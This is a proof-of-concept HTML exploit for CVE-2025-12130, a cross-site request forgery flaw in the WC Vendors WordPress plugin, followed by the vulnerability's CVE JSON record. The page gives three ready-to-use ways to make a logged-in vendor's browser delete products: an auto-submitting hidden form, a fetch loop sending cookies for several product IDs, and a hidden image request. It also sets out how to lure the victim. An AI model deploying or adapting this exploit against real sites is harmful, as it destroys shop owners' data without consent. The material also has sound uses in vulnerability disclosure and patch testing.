CVE-2025-12130

<!-- CSRF PoC for CVE-2025-12130 - Delete Vendor Products --> <!-- This PoC demonstrates how an attacker can force a logged-in vendor to delete products --> <!DOCTYPE html> <html> <head> <title>Product Deletion Request</title> </head> <body> <h1>Please wait...</h1> <!-- Method 1: Auto-submit form --> <form id="csrfForm" action="https://target-site.com/vendor_dashboard/product/delete/" method="POST"> <!-- Product ID to delete - attacker can modify this --> <input type="hidden" name="product_id" value="123"> <!-- Missing or bypassed nonce validation --> <input type="hidden" name="_wpnonce" value="any_value"> <input type="hidden" name="action" value="delete"> </form> <script> // Auto-submit the form when page loads document.getElementById('csrfForm').submit(); </script> <!-- Method 2: Using fetch API for multiple deletions --> <script> // Example: Delete multiple products const productIds = [100, 101, 102, 103, 104]; async function deleteProducts() { for (const productId of productIds) { await fetch('/vendor_dashboard/product/delete/', { method: 'POST', credentials: 'include', // Include cookies headers: { 'Content-Type': 'application/x-www-form-urlencoded', }, body: `product_id=${productId}&action=delete&_wpnonce=any_value` }); } console.log('Products deleted'); } // Uncomment to execute // deleteProducts(); </script> <!-- Method 3: Image-based request (no user interaction) --> <img src="https://target-site.com/vendor_dashboard/product/delete/?product_id=123&action=delete" style="display:none" onerror="this.parentElement.innerHTML='Error'" /> </body> </html> <!-- Attack Scenario: 1. Attacker creates this HTML page 2. Lures a logged-in vendor/admin to visit the page 3. The victim's browser automatically sends the request with valid session cookies 4. Server processes the request without proper CSRF validation 5. Specified product(s) are deleted -->

{"cve": {"id": "CVE-2025-12130", "sourceIdentifier": "[email protected]", "published": "2025-12-05T08:15:46.170", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WC Vendors – WooCommerce Multivendor, WooCommerce Marketplace, Product Vendors plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6.4. This is due to missing or incorrect nonce validation on the /vendor_dashboard/product/delete/ endpoint. This makes it possible for unauthenticated attackers to delete vendor products via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3408849/wc-vendors/trunk/classes/front/class-wcv-product-controller.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e1ed77cf-2595-477a-af86-25c917817984?source=cve", "source": "[email protected]"}]}}